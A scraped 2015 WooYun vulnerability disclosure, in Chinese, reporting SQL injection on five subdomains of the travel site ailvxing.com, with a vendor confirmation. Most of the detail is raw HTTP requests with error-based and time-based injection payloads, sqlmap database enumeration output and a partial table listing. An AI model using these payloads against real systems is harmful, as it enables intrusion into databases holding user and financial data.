爱旅行网分站网站五处sql注入打包 | wooyun-2015-0148407| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0148407

漏洞标题：爱旅行网分站网站五处sql注入打包

漏洞作者：路人甲

提交时间：2015-10-23 09:23

修复时间：2015-12-07 09:48

公开时间：2015-12-07 09:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-23：细节已通知厂商并且等待厂商处理中
2015-10-23：厂商已经确认，细节仅向厂商公开
2015-11-02：细节向核心白帽子及相关领域专家公开
2015-11-12：细节向普通白帽子公开
2015-11-22：细节向实习白帽子公开
2015-12-07：细节向公众公开

简要描述：

详细说明：

1、网站gti.ailvxing.com
参数askid

GET /e/ask/getInfo.php?enews=getreply&askid= HTTP/1.1
Referer: http://gti.ailvxing.com/skin/ailvxing/js/ask.min.js?v=201500318
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: gti.ailvxing.com
Cookie: dicvacst34=EmpireCMS_stats; dicvacst35=EmpireCMS_stats; dicvacst31=EmpireCMS_stats; dicvacst63=EmpireCMS_stats; dicvacst61=EmpireCMS_stats; 
dicvacst60=EmpireCMS_stats; dicvacst59=EmpireCMS_stats; dicvacst109=EmpireCMS_stats; dicvacst57=EmpireCMS_stats; dicvacst56=EmpireCMS_stats; dicvacst58=EmpireCMS_stats; 
dicvacst55=EmpireCMS_stats; dicvacst53=EmpireCMS_stats; dicvacst54=EmpireCMS_stats; dicvacst52=EmpireCMS_stats; dicvacst62=EmpireCMS_stats; 
dicvalastsearchtime=1445404741; dicvamybuycar=%7C36%2C196%7C%7C1%21%7C86%2C6%7C%7C1%21%7C32%2C271%7C%7C1%21%7C110%2C440%7C%7C1%21; dicvareturnurl=http%3A%2F
%2Fgti.ailvxing.com%2Fe%2Fmember%2Flogin%2F; PHPSESSID=olt6q5223euuecur6udl37h820
Accept-Encoding: gzip, deflate
---
Place: GET
Parameter: askid
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
    Payload: enews=getreply&askid=-2174 OR (SELECT 7745 FROM(SELECT COUNT(*),CONCAT(0x716c6f6371,(SELECT (CASE WHEN (7745=7745) THEN 1 ELSE 0 END)),0x7179627271,FLOOR
(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[04:05:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0
[04:05:45] [INFO] fetching database names
[04:05:46] [INFO] the SQL query used returns 3 entries
[04:05:46] [INFO] resumed: information_schema
[04:05:46] [INFO] resumed: ailvxing2015
[04:05:46] [INFO] resumed: test
available databases [3]:
[*] ailvxing2015
[*] information_schema
[*] test

2、网站hanchao.ailvxing.com，2处注入
askid参数

GET /e/ask/getInfo.php?enews=getreply&askid=' HTTP/1.1
Referer: http://hanchao.ailvxing.com/skin/ailvxing/js/ask.min.js?v=201500318
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: hanchao.ailvxing.com
Cookie: dicvacst35=EmpireCMS_stats; dicvacst109=EmpireCMS_stats; dicvacst63=EmpireCMS_stats; dicvacst62=EmpireCMS_stats; dicvacst61=EmpireCMS_stats; 
dicvacst34=EmpireCMS_stats; dicvacst32=EmpireCMS_stats; dicvacst59=EmpireCMS_stats; dicvacst57=EmpireCMS_stats; dicvacst56=EmpireCMS_stats; dicvacst55=EmpireCMS_stats; 
dicvacst58=EmpireCMS_stats; dicvacst53=EmpireCMS_stats; dicvacst52=EmpireCMS_stats; dicvacst60=EmpireCMS_stats; dicvacst54=EmpireCMS_stats; 
dicvalastsearchtime=1445410355; dicvamybuycar=%7C70%2C27%7C%7C1%21%7C32%2C273%7C%7C1%21%7C82%2C557%7C%7C1%21%7C24%2C366%7C%7C1%21%7C77%2C11%7C%7C1%21; 
dicvareturnurl=http%3A%2F%2Fhanchao.ailvxing.com%2Fe%2Fmember%2Flogin%2F; PHPSESSID=is9f01madkpa84jt1808e0lpm7
Accept-Encoding: gzip, deflate
HTTP/1.1 200 OK
Date: Wed, 21 Oct 2015 06:57:43 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Content-Length: 301
Content-Type: text/html; charset=utf-8
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&#039; order by newstime asc' at 
line 1<br>select id,classid,userid,replytext,diggtop,digger,newstime from ***_ecms_ask_reply where askid=&#039; order by newstime asc

subid参数

GET /e/visa/index.php/?enews=showsample&subid=340%2bbenchmark(20000000%2csha1(1))%2b HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://hanchao.ailvxing.com/info-36-124-0.html
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
Host: hanchao.ailvxing.com
Cookie: dicvacst114=EmpireCMS_stats; dicvacst116=EmpireCMS_stats; dicvacst31=EmpireCMS_stats; dicvacst36=EmpireCMS_stats; dicvacst35=EmpireCMS_stats; 
dicvacst109=EmpireCMS_stats; dicvacst63=EmpireCMS_stats; dicvacst62=EmpireCMS_stats; dicvacst61=EmpireCMS_stats; dicvacst34=EmpireCMS_stats; dicvacst32=EmpireCMS_stats; 
dicvacst59=EmpireCMS_stats; dicvacst57=EmpireCMS_stats; dicvacst56=EmpireCMS_stats; dicvacst55=EmpireCMS_stats; dicvacst58=EmpireCMS_stats; dicvacst53=EmpireCMS_stats; 
dicvacst52=EmpireCMS_stats; dicvacst60=EmpireCMS_stats; dicvacst54=EmpireCMS_stats
Accept-Encoding: gzip, deflate
HTTP/1.1 200 OK
Date: Wed, 21 Oct 2015 06:51:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Content-Length: 240
Content-Type: text/html; charset=utf-8
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1<br>select 
id,text,sample from ***_ecms_visa_subdata where id=340+benchmark(20000000,sha1(1))+

3 qyer.ailvxing.com 参数askid 和subid

GET /e/ask/getInfo.php?enews=getreply&askid='

4
xianlvke.ailvxing.com 参数askid 和subid

GET /e/ask/getInfo.php?enews=getreply&askid='

5
qy.ailvxing.com

GET /e/visa/index.php/?enews=showsample&subid=5

漏洞证明：

Database: ailvxing2015                                                                 
[416 tables]
+----------------------------------+
| alx_alx_accitem                  |
| alx_alx_acckemu                  |
| alx_alx_agent                    |
| alx_alx_booking                  |
| alx_alx_cardname                 |
| alx_alx_cardname_log             |
| alx_alx_ddlog                    |
| alx_alx_finance                  |
| alx_alx_finance_log              |
| alx_alx_mailtemp                 |
| alx_alx_sendmail                 |
| alx_alx_sendmail_check           |
| alx_alx_smsreply                 |
| alx_alx_smssend                  |
| alx_alx_smssend_check            |
| alx_alx_smstemp                  |
| alx_alx_tixing                   |
| alx_alx_user_finance             |
| alx_alx_user_info                |
| alx_alx_user_pay                 |
| alx_ecms_article                 |
| alx_ecms_article_check           |
| alx_ecms_article_check_data      |
| alx_ecms_article_data_1          |
| alx_ecms_article_doc             |
| alx_ecms_article_doc_data        |

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-10-23 09:46

厂商回复：

马上处理，谢谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0148407

漏洞标题：爱旅行网分站网站五处sql注入打包

相关厂商：爱旅行网

漏洞作者：路人甲

提交时间：2015-10-23 09:23

修复时间：2015-12-07 09:48

公开时间：2015-12-07 09:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0148407

漏洞标题：爱旅行网分站网站五处sql注入打包

相关厂商：爱旅行网

漏洞作者： 路人甲

提交时间：2015-10-23 09:23

修复时间：2015-12-07 09:48

公开时间：2015-12-07 09:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0148407"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云